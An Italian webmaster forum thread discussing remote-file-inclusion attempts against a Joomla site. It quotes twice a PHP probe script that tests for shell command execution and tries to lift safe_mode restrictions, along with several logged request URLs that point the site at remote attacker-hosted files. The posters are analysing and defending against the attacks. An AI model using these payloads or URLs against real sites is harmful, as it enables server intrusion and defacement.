• User Attivo

    Possibile tentativo di attacco?

    Scusate ragazzi proprio in questo momento ho visto che è arrivata una visita su un mio sito Joomla con una roba del genere:

    www . miosito.it/?mosConfig_absolute_path=h t t p : // rise.dk/cache/id2.txt?

    aperto il file ho trovato questo:

    [php]
    <?php
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    $contrs=0;
    }
    else{
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    $contrs=0;}
    else{
    $contrs=1;
    }}

    if($contrs == 0){
    echo("FUCKSAFEMODEOFFBYMIC22");
    }else{
    echo("FUCKSAFEMODEONBYMIC22");
    }

    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;[/php]Cos'è secondo voi?


  • User Attivo

    Ciao Nemesis,

    è un exploit per tentare il defacing del dominio. Qualora abbia successo potresti ritrovarti la home cambiata:D.
    Anche sui miei siti ne arrivano parecchi, ma per fortuna tenendo sempre il tutto aggiornato e bloccando di tanto in tanto le classi di ip incriminate tramite htaccess riesco ad avere la meglio.
    Purtroppo non esiste rimedio, devi imparare a convivere con questi attacchi.
    Ciao

    Dario


  • User Attivo

    Ma scusa.. non sono un guru del php, ma
    ?mosConfig_absolute_path=quello che ti pare

    si può fare solo se REGISTER GLOBAL è on, e l'htaccess di joomla è disattivato, o sbaglio?

    Certo che ci si divertono parecchio i lamer con Joomla e gli altri CMS opensource eh..


  • User Attivo

    capita anche a me ogni tanto, ma ultimamente trovo sempre log con link simili:
    dominio.com/com/sun/media/sound/DirectAudioDeviceProvider.class e di norma lo stesso ip prova due o tre directory simili sempre alla ricerca del file .class.

    ma mi domando sempre se a farlo sono dei programmi in automatico o se ci sta dietro una persona a perdere tempo..


  • User Attivo

    Ciao ragazzi,

    vorrei fare una sezione su JoomlaShow dedicata a questi argomenti di sicurezza, come ad esempio quali sono gli exploit più frequenti, cosa tentano di fare e come bloccarli.

    Se qualcuno è interessato a contribuire lo aspettiamo a braccia aperte.


  • Super User

    Volendo, si può fare anche qui nel Forum GT :ciauz:


  • User Newbie

    @Nemesis_RM said:

    Scusate ragazzi proprio in questo momento ho visto che è arrivata una visita su un mio sito Joomla con una roba del genere:

    www . miosito.it/?mosConfig_absolute_path="h"t t p : // rise.dk/cache/id2.txt?

    aperto il file ho trovato questo:

    [php]
    <?php
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    $contrs=0;
    }
    else{
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    $contrs=0;}
    else{
    $contrs=1;
    }}

    if($contrs == 0){
    echo("FUCKSAFEMODEOFFBYMIC22");
    }else{
    echo("FUCKSAFEMODEONBYMIC22");
    }

    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;[/php]Cos'è secondo voi?

    Ciao Nemesis_RM, premetto che non ho esperienza in materia di attacchi quindi vorrei capire meglio quel che ti è accaduto perchè accade la stessa cosa anche a me ed anche sotto altre forme del tipo:
    /index.php?pag=f t p : // 80.50.253.90/upload/trop/old?
    /index.php?pag=h t t p : // mifumisokuimsedfsisumsdoklop.mail15.su/image?
    /index.php?option=com_content&amp;amp;task=view&amp;amp;id=19&amp;amp;Itemid=34&amp;lang=it&lang=en
    /index.php?pag=h t t p : // www . wsteam.net/include.c?
    /index.php?pag=h t t p : // amygirl.webs.io/pb.php?
    /index.php?pag=h t t p : // hotaebywk.chat.ru/html/body?

    Quando dici: " aperto il file ho trovato questo:" intendi dire che sei andato all'URL h t t p : // rise.dk/cache/id2.txt? ed il browser ti ha mostrato quel codice? oppure hai trovato il file nelle cartelle del tuo sito? Perchè se così fosse significa che l'attacco è riuscito. Potresti aiutarmi a capire?:?
    Grazie ciao.


  • User Attivo

    Intendevo dire che sono andato a quell'url ed ho visto il codice di quei file.
    Naturalmente sono file di testo o altre estensioni che il server non esegue se si apre il file nella url, altrimenti aprendole il codice verrebbe eseguito sulle macchine di questi simpaticoni. Questi file funzionano solo se vengono inclusi.

    Ne vedo davvero tanti di questi tentativi, ma sono molto facili da bloccare.

    Ogni tanto gli do un'occhiata, pensate che ne ho visto addirittura uno scritto in perl!!

    Ma boh